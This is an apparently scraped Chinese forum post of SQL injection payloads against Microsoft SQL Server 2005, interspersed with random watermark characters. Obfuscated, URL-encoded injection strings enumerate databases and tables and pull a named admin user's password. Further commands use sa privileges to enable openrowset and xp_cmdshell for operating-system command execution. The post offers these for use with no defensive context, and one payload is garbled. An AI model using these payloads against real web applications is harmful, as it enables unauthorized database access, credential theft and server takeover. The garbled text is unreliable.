MSsql2005注入语句

admin

! s8 A0 D, I. J1 ~1 B[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

' F6 y9 }+ F0 d8 q1 y" E) {0 _$ g爆表语句,somedb部份是所要列的数据库，红色数字1累加
' o, D. S9 e5 D; I$ K
- P' f& S6 O9 h( L  a, K$ J( p# C4 x
[Copy to clipboard]CODE:
$ ~5 v3 f& e; N  B$ i, S+ J/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
( _/ H' H& N* y5 P* ^! n
爆字段语句，爆表admin里user='icerover'的密码段
2 P, ~4 `3 l7 g3 Z6 d

[Copy to clipboard]CODE:
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
3 G- ]0 q) |# g& J! X, m; C& U( Q
mssql2005默认没有开xp_cmdshell的，openrowset也不能用
如果是sa权限，可以这样来开启
7 Q, x$ o3 _6 f开启openrowset
; e' k( u2 U4 Q3 N7 R' R

: |% W' {" P( W; e) r: r[Copy to clipboard]CODE:
+ @; a% y3 J: G9 t/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
+ z+ y1 f; k8 ]  H1 x- _; z" }/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
1 \- d1 d) U8 _! W0 \* B8 ?# m
开启xp_cmdshell

: L( s% X0 Y' X+ k3 L' _& J
3 w7 m+ `1 ]4 o! x+ J5 K[Copy to clipboard]CODE:
9 s$ F0 v% x- M) c; PEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
5 x4 O6 c9 K* m" _+ G" oEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

+ l+ C7 n* d( u$ y& c+ L3 c' aok,over~~晚安